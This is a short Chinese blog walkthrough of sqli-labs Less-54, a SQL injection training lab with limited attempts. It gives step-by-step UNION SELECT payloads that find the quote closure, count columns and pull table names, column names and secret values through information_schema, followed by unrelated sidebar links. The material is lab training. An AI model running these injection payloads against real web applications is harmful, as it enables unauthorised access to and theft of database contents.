当前位置:网站首页>SQL注入 Less54(限制次数的SQL注入+union注入)
SQL注入 Less54(限制次数的SQL注入+union注入)
2022-07-31 22:34:00 【华为云】

限制次数的SQL注入
每次reset,数据库的表名、字段名和数据都会发生改变
?id=1
?id=1'
发现没有报错信息
?id=1"
回显正常,直接排查双引号开头的闭合方式
?id=1'--+?id=1')--+?id=1'))--+
单引号回显正常,所以是单引号闭合
?id=1' order by 3--+ 回显正常?id=1' order by 4--+ 回显错误
所以有三列
?id=-1' union select 1,version(),database()--+
?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="challenges" and table_name="470aojlrx1")--+

?id=-1' union select 1,2,(select group_concat(id,sessid,secret_KJU8,tryy) from 470aojlrx1)--+

边栏推荐
- Redis Overview: Talk to the interviewer all night long about Redis caching, persistence, elimination mechanism, sentinel, and the underlying principles of clusters!...
- renderjs usage in uni-app
- uniapp小程序检查、提示更新
- 21. Support Vector Machine - Introduction to Kernel Functions
- BM5 merge k sorted linked lists
- iNeuOS industrial Internet operating system, equipment operation and maintenance business and "low-code" form development tools
- One thing to say, is outsourcing company worth it?
- C language parsing json string (json object is converted to string)
- 基于单片机GSM的防火防盗系统的设计
- Commonly used security penetration testing tools (penetration testing tools)
猜你喜欢

Chapter Six

TestCafeSummary

【论文精读】iNeRF

MATLAB program design and application 2.4 Common internal functions of MATLAB

Flink_CDC construction and simple use

Recognize anomalies (you will understand after reading this)

ECCV 2022 Huake & ETH propose OSFormer, the first one-stage Transformer framework for camouflaging instance segmentation!The code is open source!...

Bika LIMS open source LIMS set - use of SENAITE (detection process)

Pytest初体验

Realize serial port receiving data based on STM32 ring queue
随机推荐
程序进程和线程(线程的并发与并行)以及线程的基本创建和使用
20. Support vector machine - knowledge of mathematical principles
UVM RAL model and built-in seq
IDA PRO中汇编结构体识别
How to import a Golang external package and use it?
The article you worked so hard to write may not be your original
【Acwing】第62场周赛 题解
Structure of the actual combat battalion module eight operations
无状态与有状态的区别
[QNX Hypervisor 2.2用户手册]9.14 set
linux view redis version command (linux view mysql version number)
"SDOI2016" Journey Problem Solution
Binary tree non-recursive traversal
网络安全--通过握手包破解WiFi(详细教程)
C language parsing json string (json object is converted to string)
Pytest first experience
focus on!Haitai Fangyuan joins the "Personal Information Protection Self-discipline Convention"
C#中引用类型的变量做为参数在方法调用时加不加 ref 关键字的不同之处
"SDOI2016" Journey Problem Solution
GateWay implements load balancing